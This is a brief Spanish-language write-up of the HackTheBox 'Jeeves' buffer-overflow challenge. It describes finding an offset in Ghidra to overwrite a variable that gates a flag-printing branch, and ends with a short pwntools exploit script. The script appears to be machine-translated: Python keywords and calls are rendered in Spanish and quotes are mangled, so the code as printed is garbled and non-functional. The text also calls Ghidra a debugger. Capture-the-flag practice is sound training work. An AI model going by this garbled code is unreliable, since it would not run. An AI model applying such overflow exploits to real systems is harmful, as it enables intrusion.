Cubrimos un escenario de un binario vulnerable a la vulnerabilidad de desbordamiento del búfer. El binario tiene protecciones NX y PIE habilitadas, por lo que abrimos el binario con el depurador Ghidra y creamos la metodología de explotación basada en el cálculo de las compensaciones de la variable de entrada y otra variable que controla una entrada a una declaración if que imprime la bandera. El objetivo era controlar el valor de ese binario y dejar que el flujo de ejecución ingresara a la declaración if. Esto fue parte de HackTheBox Jeeves Introducción a la pista de explotación binaria.
Notas sobre técnicas de desbordamiento de búfer
El código de explotación está debajo
##Binicio
de importación pwn *
objetivo = proceso ("nc")
target.sendline(“puerto ip”)
carga útil = “A”*60
byte_to_string = p64(valor)
carga útil = carga útil + byte_to_string.decode(“ISO-8859-1”)
target.sendline(carga útil)
imprimir destino.recvuntil(“.”)
##Final
Tutorial en vídeo